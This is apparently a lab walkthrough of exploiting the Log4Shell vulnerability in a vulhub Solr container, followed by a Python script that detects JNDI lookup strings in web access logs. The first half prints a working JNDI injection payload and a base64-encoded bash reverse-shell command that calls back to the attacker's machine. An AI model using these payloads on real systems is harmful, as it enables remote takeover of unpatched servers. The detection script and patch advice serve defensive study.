Start the environment:
root@bt-virtual-machine:/zbt/vulhub-master/log4j/CVE-2021-44228# docker-compose up -d
Log4j2 page on port 3839:
http://192.168.29.130:8983/solr/admin/cores?action=1
Submit a dnslog payload as the parameter:
http://192.168.29.130:8983/solr/admin/cores?action=${jndi:ldap://u25tly.dnslog.cn}
The request shows up in Dnslog, which proves the log4j2 vulnerability is present.
Attack:
Tool used: JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar
# 192.168.29.128 is the listening address of the Kali attack machine; run this on the Kali machine:
java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -C bash -c "{echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjI5LjEyOC82OTY5IDA+JjE=}|{base64,-d}|{bash,-i}" -A 192.168.29.128
The base64 decodes to:
java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -C bash -c "{echo,bash -i >& /dev/tcp/192.168.29.128/6969 0>&1}|{base64,-d}|{bash,-i}" -A 192.168.29.128
The tool prints the rmi and ldap parameters:
Target environment(Build in JDK 1.8 whose trustURLCodebase is true):
rmi://192.168.29.128:1099/vvl2u9
ldap://192.168.29.128:1389/vvl2u9
Target environment(Build in JDK whose trustURLCodebase is false and have Tomcat 8+ or SpringBoot 1.2.x+ in classpath):
rmi://192.168.29.128:1099/xs1wkb
Target environment(Build in JDK 1.7 whose trustURLCodebase is true):
rmi://192.168.29.128:1099/qzrfe7
ldap://192.168.29.128:1389/qzrfe7
Send the attack payload:
http://192.168.29.130:8983/solr/admin/cores?action=${jndi:rmi://192.168.29.128:1099/vvl2u9}
The Kali listener on port 6969 receives the shell (access obtained).
Shut down the environment
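The two requests above (the dnslog probe and the rmi payload) both travel in the query string and are written to the web server's access log before Log4j ever evaluates them, so a defender can catch this class of attack by scanning request logs for JNDI lookup strings. The following script is an added example that is not part of the original write-up and not code from vulhub or JNDI-Injection-Exploit. It URL-decodes each line, matches the `${jndi:<scheme>://host[:port]` pattern, and extracts the callback host and port so an analyst can see where the target was being directed. The log lines are constructed for the example; the timestamps, response codes and log format are assumptions, though the payload strings mirror the ones used in the walkthrough. Note the tool output's own caveat: the LDAP/RMI remote-class-loading path requires trustURLCodebase to be true, which recent JDK builds set to false by default, which is why the tool also offers the Tomcat/SpringBoot deserialization-gadget variant; upgrading log4j-core to 2.17.1 or later removes the message lookup entirely.

```python
import re
from urllib.parse import unquote

# Constructed sample access-log lines for this example (not from the original page).
# Line 1 is a benign Solr request, line 2 is the dnslog probe, line 3 is the
# URL-encoded form of the rmi payload as a browser or scanner would send it.
SAMPLE_LOG = """\
192.168.29.128 - - [10/Dec/2021:10:00:01 +0000] "GET /solr/admin/cores?action=STATUS HTTP/1.1" 200 512
192.168.29.128 - - [10/Dec/2021:10:00:05 +0000] "GET /solr/admin/cores?action=${jndi:ldap://u25tly.dnslog.cn} HTTP/1.1" 500 0
192.168.29.128 - - [10/Dec/2021:10:00:09 +0000] "GET /solr/admin/cores?action=%24%7Bjndi%3Armi%3A%2F%2F192.168.29.128%3A1099%2Fvvl2u9%7D HTTP/1.1" 500 0
"""

# Matches a JNDI lookup and captures the scheme, callback host and optional port.
# The schemes listed are the JNDI providers that ship with the JDK; the regex is
# deliberately tolerant of whitespace around the separators.
JNDI_RE = re.compile(
    r"\$\{\s*jndi\s*:\s*(?P<scheme>ldaps?|rmi|dns|iiop|corba|nds|http)\s*:\s*//"
    r"(?P<host>[^/:}\s]+)(?::(?P<port>\d+))?",
    re.IGNORECASE,
)


def find_jndi_lookups(line):
    """Return a list of JNDI lookups found in one log line.

    The line is URL-decoded first so that percent-encoded payloads are caught.
    Each hit is a dict with the scheme, callback host, port (or None) and the
    raw matched text for the analyst's record.
    """
    decoded = unquote(line)
    hits = []
    for m in JNDI_RE.finditer(decoded):
        hits.append(
            {
                "scheme": m.group("scheme").lower(),
                "host": m.group("host"),
                "port": int(m.group("port")) if m.group("port") else None,
                "lookup": m.group(0),
            }
        )
    return hits


def scan_log(text):
    """Scan a whole log and return (line_number, hit) tuples for every lookup."""
    findings = []
    for lineno, line in enumerate(text.splitlines(), 1):
        for hit in find_jndi_lookups(line):
            findings.append((lineno, hit))
    return findings


if __name__ == "__main__":
    for lineno, hit in scan_log(SAMPLE_LOG):
        port = hit["port"] if hit["port"] is not None else "default"
        print(f"line {lineno}: {hit['scheme']} callback to {hit['host']} port {port}: {hit['lookup']}")
```

Run against the sample, the script flags lines 2 and 3 and ignores the benign STATUS request. In practice the same function would be fed from a log shipper or SIEM, and the extracted host is the pivot for blocking outbound LDAP/RMI connections from the application host and for checking DNS logs for the dnslog domain.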